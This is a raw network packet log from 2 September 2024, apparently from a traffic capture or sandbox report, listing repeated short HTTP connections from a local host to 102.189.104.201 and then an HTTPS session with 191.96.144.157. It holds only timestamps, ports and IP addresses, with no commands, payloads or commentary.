Sep 2, 2024 11:42:36.826939106 CEST	49746	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:36.831656933 CEST	80	49746	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:36.831665993 CEST	80	49746	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:37.744398117 CEST	80	49746	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:37.744925976 CEST	80	49746	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:37.745023966 CEST	49746	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:37.745054007 CEST	49746	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:37.747379065 CEST	49747	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:37.749875069 CEST	80	49746	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:37.752181053 CEST	80	49747	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:37.752254963 CEST	49747	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:37.752362013 CEST	49747	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:37.752388000 CEST	49747	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:37.757083893 CEST	80	49747	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:37.757204056 CEST	80	49747	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:38.679538012 CEST	80	49747	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:38.679550886 CEST	80	49747	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:38.679783106 CEST	49747	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:38.722605944 CEST	49747	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:38.727389097 CEST	80	49747	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:38.759354115 CEST	49748	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:38.764142990 CEST	80	49748	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:38.764238119 CEST	49748	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:38.766779900 CEST	49748	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:38.766807079 CEST	49748	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:38.771531105 CEST	80	49748	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:38.771605015 CEST	80	49748	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:39.714164019 CEST	80	49748	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:39.714193106 CEST	80	49748	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:39.714287996 CEST	49748	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:39.714457035 CEST	49748	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:39.719187021 CEST	80	49748	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:39.723325968 CEST	49749	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:39.728220940 CEST	80	49749	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:39.728310108 CEST	49749	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:39.728411913 CEST	49749	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:39.728432894 CEST	49749	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:39.733227015 CEST	80	49749	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:39.733237028 CEST	80	49749	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:40.626892090 CEST	80	49749	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:40.627341032 CEST	80	49749	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:40.627412081 CEST	49749	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:40.627450943 CEST	49749	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:40.630063057 CEST	49750	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:40.634793997 CEST	80	49749	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:40.637072086 CEST	80	49750	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:40.637141943 CEST	49750	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:40.637253046 CEST	49750	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:40.637279034 CEST	49750	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:40.641969919 CEST	80	49750	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:40.642123938 CEST	80	49750	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:41.556263924 CEST	80	49750	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:41.556508064 CEST	80	49750	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:41.556560993 CEST	49750	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:41.556606054 CEST	49750	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:41.560198069 CEST	49751	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:41.561387062 CEST	80	49750	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:41.565298080 CEST	80	49751	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:41.565371037 CEST	49751	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:41.565570116 CEST	49751	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:41.565582991 CEST	49751	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:41.571012974 CEST	80	49751	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:41.571161032 CEST	80	49751	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:42.462212086 CEST	80	49751	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:42.462316036 CEST	80	49751	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:42.462384939 CEST	49751	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:42.462517977 CEST	49751	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:42.465775013 CEST	49752	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:42.467268944 CEST	80	49751	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:42.470587969 CEST	80	49752	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:42.470680952 CEST	49752	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:42.470792055 CEST	49752	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:42.470805883 CEST	49752	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:42.475526094 CEST	80	49752	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:42.475665092 CEST	80	49752	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:43.396027088 CEST	80	49752	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:43.396066904 CEST	80	49752	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:43.396126986 CEST	49752	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:43.396281004 CEST	49752	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:43.398832083 CEST	49753	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:43.403527975 CEST	80	49752	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:43.405659914 CEST	80	49753	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:43.405731916 CEST	49753	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:43.405877113 CEST	49753	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:43.405930042 CEST	49753	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:43.410999060 CEST	80	49753	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:43.411065102 CEST	80	49753	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:44.306678057 CEST	80	49753	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:44.307347059 CEST	80	49753	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:44.307396889 CEST	49753	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:44.307466030 CEST	49753	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:44.312217951 CEST	80	49753	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:44.319148064 CEST	49754	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:44.323920012 CEST	80	49754	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:44.323982000 CEST	49754	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:44.324088097 CEST	49754	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:44.324112892 CEST	49754	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:44.328804016 CEST	80	49754	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:44.328974962 CEST	80	49754	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:45.219665051 CEST	80	49754	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:45.220352888 CEST	80	49754	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:45.220521927 CEST	49754	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:45.220521927 CEST	49754	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:45.222939014 CEST	49755	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:45.225351095 CEST	80	49754	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:45.227758884 CEST	80	49755	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:45.227842093 CEST	49755	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:45.227931023 CEST	49755	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:45.227952957 CEST	49755	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:45.232666969 CEST	80	49755	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:45.232831001 CEST	80	49755	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:46.144552946 CEST	80	49755	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:46.144790888 CEST	80	49755	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:46.144857883 CEST	49755	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:46.144891024 CEST	49755	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:46.147188902 CEST	49756	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:46.149821043 CEST	80	49755	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:46.151962042 CEST	80	49756	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:46.152043104 CEST	49756	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:46.152132988 CEST	49756	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:46.152154922 CEST	49756	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:46.156905890 CEST	80	49756	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:46.156917095 CEST	80	49756	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:47.094243050 CEST	80	49756	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:47.094651937 CEST	80	49756	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:47.094815016 CEST	49756	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:47.094815969 CEST	49756	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:47.097012997 CEST	49757	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:47.099617958 CEST	80	49756	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:47.101835966 CEST	80	49757	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:47.101907015 CEST	49757	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:47.102015972 CEST	49757	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:47.102040052 CEST	49757	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:47.106797934 CEST	80	49757	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:47.106928110 CEST	80	49757	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.002998114 CEST	80	49757	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.003165007 CEST	80	49757	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.003225088 CEST	49757	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.003263950 CEST	49757	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.005542994 CEST	49758	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.008338928 CEST	80	49757	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.010647058 CEST	80	49758	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.010731936 CEST	49758	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.010832071 CEST	49758	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.010863066 CEST	49758	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.016175032 CEST	80	49758	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.016184092 CEST	80	49758	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.936934948 CEST	80	49758	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.936969042 CEST	80	49758	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.937036037 CEST	49758	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.937253952 CEST	49758	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.940087080 CEST	49759	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.942172050 CEST	80	49758	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.945172071 CEST	80	49759	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.945374966 CEST	49759	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.945523024 CEST	49759	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.945555925 CEST	49759	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:48.950577021 CEST	80	49759	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:48.950742960 CEST	80	49759	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:49.851730108 CEST	80	49759	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:49.853494883 CEST	80	49759	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:49.853565931 CEST	49759	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:49.853615999 CEST	49759	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:49.856403112 CEST	49760	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:49.860371113 CEST	80	49759	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:49.862483978 CEST	80	49760	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:49.862565041 CEST	49760	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:49.862679005 CEST	49760	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:49.862703085 CEST	49760	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:49.867898941 CEST	80	49760	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:49.868019104 CEST	80	49760	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:50.783155918 CEST	80	49760	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:50.783221006 CEST	80	49760	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:50.783381939 CEST	49760	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:50.783426046 CEST	49760	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:50.785754919 CEST	49761	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:50.788283110 CEST	80	49760	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:50.790554047 CEST	80	49761	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:50.790729046 CEST	49761	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:50.790874004 CEST	49761	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:50.790896893 CEST	49761	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:50.795694113 CEST	80	49761	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:50.796612978 CEST	80	49761	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:51.699743986 CEST	80	49761	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:51.699759007 CEST	80	49761	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:51.699970961 CEST	49761	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:51.700370073 CEST	49761	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:51.705219984 CEST	80	49761	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:52.168559074 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.168592930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.168695927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.169302940 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.169317961 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.631964922 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.632145882 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.636589050 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.636596918 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.636977911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.646902084 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.692498922 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.757829905 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.757869959 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.757909060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.757936954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.758042097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.758042097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.758069038 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.758476973 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.758517027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.758529902 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.758538008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.758585930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.759217978 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.759351015 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.759392977 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.759402037 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.762629986 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.762677908 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.762686014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.762696981 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.762746096 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.762753010 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.809359074 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.841746092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.841813087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.841847897 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842081070 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.842094898 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842152119 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842160940 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.842168093 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842227936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.842346907 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842581987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842628002 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.842634916 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842763901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842798948 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842809916 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.842816114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.842864037 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.842869997 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843276978 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843327999 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.843333006 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843408108 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843455076 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.843461037 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843734980 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843779087 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.843784094 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843838930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.843880892 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.843890905 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.844433069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.844465017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.844486952 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.844495058 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.844542980 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.844547987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.846712112 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.846764088 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.846771002 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.886265039 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.886356115 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.886368036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.886424065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.925982952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926037073 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926049948 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926057100 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926086903 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926116943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926147938 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926151991 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926175117 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926259995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926311970 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926318884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926372051 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926449060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926507950 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926604033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926657915 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926696062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926748991 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.926877022 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.926923037 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.927341938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.927396059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.927439928 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.927495956 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.927726984 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.927781105 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.927818060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.927874088 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.928700924 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.928755999 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.930998087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.931032896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.931057930 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.931065083 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.931092024 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.970364094 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.970417976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:52.970427990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:52.970472097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010035992 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010117054 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010174036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010210991 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010231972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010238886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010250092 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010251045 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010288954 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010299921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010305882 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010344028 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010390997 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010441065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010447979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010493040 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010524988 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010572910 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010601044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010643005 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010654926 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010659933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010689020 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:53.010874033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010905027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:53.010921001 CEST	49763	443	192.168.2.4	191.96.144.157
